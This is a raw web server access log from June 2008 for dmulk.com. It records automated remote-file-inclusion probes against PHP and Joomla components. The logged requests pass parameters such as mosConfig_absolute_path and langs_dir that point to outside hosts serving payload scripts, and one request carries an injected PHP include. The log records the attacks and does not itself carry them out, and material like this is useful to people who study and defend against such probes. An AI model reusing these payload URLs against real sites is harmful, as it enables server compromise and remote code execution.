203.22.204.47 - - [17/Jun/2008:10:14:45 -0700] "GET /logs/access_080507.log//language.inc.php?langs_dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.47 - - [17/Jun/2008:10:14:45 -0700] "GET //language.inc.php?langs_dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.47 - - [17/Jun/2008:10:14:45 -0700] "GET /logs//language.inc.php?langs_dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
151.11.24.250 - - [17/Jun/2008:10:15:14 -0700] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.emilylamont.com/mambots/editors/tinymce/scripts/tinymce/php??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "dmulk.com"
151.11.24.250 - - [17/Jun/2008:10:15:14 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.emilylamont.com/mambots/editors/tinymce/scripts/tinymce/php??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "dmulk.com"
207.44.240.91 - - [17/Jun/2008:10:15:16 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.240.91 - - [17/Jun/2008:10:15:17 -0700] "GET /phphtml.php?htmlclass_path=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.240.91 - - [17/Jun/2008:10:15:17 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.47 - - [17/Jun/2008:10:15:32 -0700] "GET /logs/access_080331.log//language.inc.php?langs_dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.40.230.5 - - [17/Jun/2008:10:16:18 -0700] "GET /logs/access_080312.log//index.php?name=PNphpBB2&file=http://www.suttas.com/files/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [17/Jun/2008:10:17:22 -0700] "GET /logs/access_080228.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.22.204.47 - - [17/Jun/2008:10:17:41 -0700] "GET //language.inc.php?langs_dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.40.230.5 - - [17/Jun/2008:10:17:51 -0700] "GET /logs/access_080312.log//index.php?name=PNphpBB2&file=http://www.suttas.com/files/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:19:07 -0700] "GET /logs/access_080215.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:19:07 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:19:07 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:19:12 -0700] "GET /logs/access_080215.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:19:13 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:19:13 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:19:58 -0700] "GET /logs/access_080215.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:19:59 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:19:59 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.249.193.130 - - [17/Jun/2008:10:20:11 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/old? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.249.193.2 - - [17/Jun/2008:10:20:12 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/1? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.102.101.139 - - [17/Jun/2008:10:20:12 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:20:13 -0700] "GET /logs/access_080215.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:20:13 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.249.193.130 - - [17/Jun/2008:10:20:13 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/1? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:20:13 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.249.193.2 - - [17/Jun/2008:10:20:44 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/old? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.249.193.2 - - [17/Jun/2008:10:20:44 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/1? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.249.193.2 - - [17/Jun/2008:10:20:45 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/old? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.249.193.2 - - [17/Jun/2008:10:20:45 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/1? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.240.91 - - [17/Jun/2008:10:21:21 -0700] "GET /phphtml.php?htmlclass_path=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.198.234.6 - - [17/Jun/2008:10:21:47 -0700] "GET /logs/access_080215.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.198.234.6 - - [17/Jun/2008:10:21:47 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.198.234.6 - - [17/Jun/2008:10:21:48 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.228 - - [17/Jun/2008:10:22:11 -0700] "GET /logs/access_071204.log HTTP/1.0" 200 9222 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:22:19 -0700] "GET /logs/access_080215.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:22:20 -0700] "GET /logs/access_080215.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:22:21 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:22:21 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:22:21 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:22:22 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:22:24 -0700] "GET /logs/access_080215.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:22:25 -0700] "GET /logs/access_080215.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:22:25 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:22:25 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:22:25 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [17/Jun/2008:10:22:25 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.61.10.21 - - [17/Jun/2008:10:22:28 -0700] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://www.clubnarok.com/head.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.61.10.21 - - [17/Jun/2008:10:22:28 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.clubnarok.com/head.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.61.10.21 - - [17/Jun/2008:10:22:28 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.clubnarok.com/head.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.61.10.21 - - [17/Jun/2008:10:22:29 -0700] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://www.clubnarok.com/head.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
146.83.237.4 - - [17/Jun/2008:10:23:15 -0700] "GET /logs/access_080312.log/admin.php?include_path=http://kclarkes.t35.com/cd/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
146.83.237.4 - - [17/Jun/2008:10:23:15 -0700] "GET /admin.php?include_path=http://kclarkes.t35.com/cd/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
146.83.237.4 - - [17/Jun/2008:10:23:16 -0700] "GET /logs/admin.php?include_path=http://kclarkes.t35.com/cd/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.193.232.188 - - [17/Jun/2008:10:23:32 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.informatizados.es/docs/info/ids.txt??? HTTP/1.1" 200 3694 "-" "libwww-perl/5.803" "www.dmulk.com"
74.200.202.37 - - [17/Jun/2008:10:23:39 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.200.202.37 - - [17/Jun/2008:10:23:42 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.200.202.37 - - [17/Jun/2008:10:23:43 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.67.119 - - [17/Jun/2008:10:23:57 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [17/Jun/2008:10:23:58 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.200.202.37 - - [17/Jun/2008:10:24:16 -0700] "GET /logs/access_080124.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.200.202.37 - - [17/Jun/2008:10:24:16 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.200.202.37 - - [17/Jun/2008:10:24:16 -0700] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.215.105 - - [17/Jun/2008:10:25:10 -0700] "GET /logs/access_080429.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.61.10.21 - - [17/Jun/2008:10:25:12 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.clubnarok.com/head.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.200.202.37 - - [17/Jun/2008:10:25:22 -0700] "GET /logs/access_080124.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.200.202.37 - - [17/Jun/2008:10:25:22 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.200.202.37 - - [17/Jun/2008:10:25:22 -0700] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
79.171.18.36 - - [17/Jun/2008:10:25:33 -0700] "GET /logs/access_080107.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [17/Jun/2008:10:25:34 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [17/Jun/2008:10:25:34 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [17/Jun/2008:10:25:56 -0700] "GET /logs/access_071220.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.43.96.205 - - [17/Jun/2008:10:25:57 -0700] "GET /logs/access_080126.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "dmulk.com"
74.200.202.37 - - [17/Jun/2008:10:25:57 -0700] "GET /logs/access_080124.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.200.202.37 - - [17/Jun/2008:10:25:58 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.43.96.205 - - [17/Jun/2008:10:25:58 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "dmulk.com"
74.200.202.37 - - [17/Jun/2008:10:25:58 -0700] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.43.96.205 - - [17/Jun/2008:10:25:58 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "dmulk.com"
213.249.193.2 - - [17/Jun/2008:10:26:22 -0700] "GET /logs/index.php?redir=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.249.193.2 - - [17/Jun/2008:10:26:26 -0700] "GET /index.php?redir=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.0" 200 18393 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.213.218 - - [17/Jun/2008:10:27:00 -0700] "GET /logs/access_080103.log/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://and3rogues.com/atr/images/avatars/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.213.218 - - [17/Jun/2008:10:27:01 -0700] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://and3rogues.com/atr/images/avatars/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.213.218 - - [17/Jun/2008:10:27:01 -0700] "GET /logs/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://and3rogues.com/atr/images/avatars/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.213.218 - - [17/Jun/2008:10:27:02 -0700] "GET /logs/access_080129.log/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://and3rogues.com/atr/images/avatars/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.102.242.34 - - [17/Jun/2008:10:27:07 -0700] "GET /logs/access_080429.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.249.193.130 - - [17/Jun/2008:10:27:07 -0700] "GET /logs/index.php?redir=ftp:ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.249.193.130 - - [17/Jun/2008:10:27:11 -0700] "GET /index.php?redir=ftp:ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.0" 200 18405 "-" "libwww-perl/5.805" "www.dmulk.com"
213.249.193.130 - - [17/Jun/2008:10:27:21 -0700] "GET /logs/index.php?redir=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.249.193.2 - - [17/Jun/2008:10:27:27 -0700] "GET /index.php?redir=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.0" 200 18393 "-" "libwww-perl/5.805" "www.dmulk.com"
207.213.245.215 - - [17/Jun/2008:10:27:45 -0700] "GET /logs/access_080308.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
207.213.245.215 - - [17/Jun/2008:10:27:46 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
207.213.245.215 - - [17/Jun/2008:10:27:46 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
79.171.18.36 - - [17/Jun/2008:10:28:04 -0700] "GET /logs/access_080107.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [17/Jun/2008:10:28:05 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [17/Jun/2008:10:28:05 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:28:20 -0700] "GET /logs/access_080312.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.171.18.36 - - [17/Jun/2008:10:28:26 -0700] "GET /logs/access_071220.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.172.57.250 - - [17/Jun/2008:10:28:29 -0700] "GET /logs/access_080312.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.213.218 - - [17/Jun/2008:10:30:29 -0700] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://and3rogues.com/atr/images/avatars/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.205.67.205 - - [17/Jun/2008:10:30:50 -0700] "GET /logs/access_080429.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.213.218 - - [17/Jun/2008:10:31:32 -0700] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://and3rogues.com/atr/images/avatars/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.206.59 - - [17/Jun/2008:10:32:31 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.206.59 - - [17/Jun/2008:10:32:31 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.206.59 - - [17/Jun/2008:10:32:32 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.206.59 - - [17/Jun/2008:10:33:01 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.213.218 - - [17/Jun/2008:10:33:42 -0700] "GET /logs/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://and3rogues.com/atr/images/avatars/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.213.218 - - [17/Jun/2008:10:33:42 -0700] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://and3rogues.com/atr/images/avatars/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.221.143.111 - - [17/Jun/2008:10:33:44 -0700] "GET /scanhttp://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.18.207.64 - - [17/Jun/2008:10:34:06 -0700] "GET /errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:10:35:53 -0700] "GET /logs/index.php?redir=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:10:35:54 -0700] "GET /logs/index.php?redir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:10:36:00 -0700] "GET /index.php?redir=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 200 18409 "-" "libwww-perl/5.805" "www.dmulk.com"
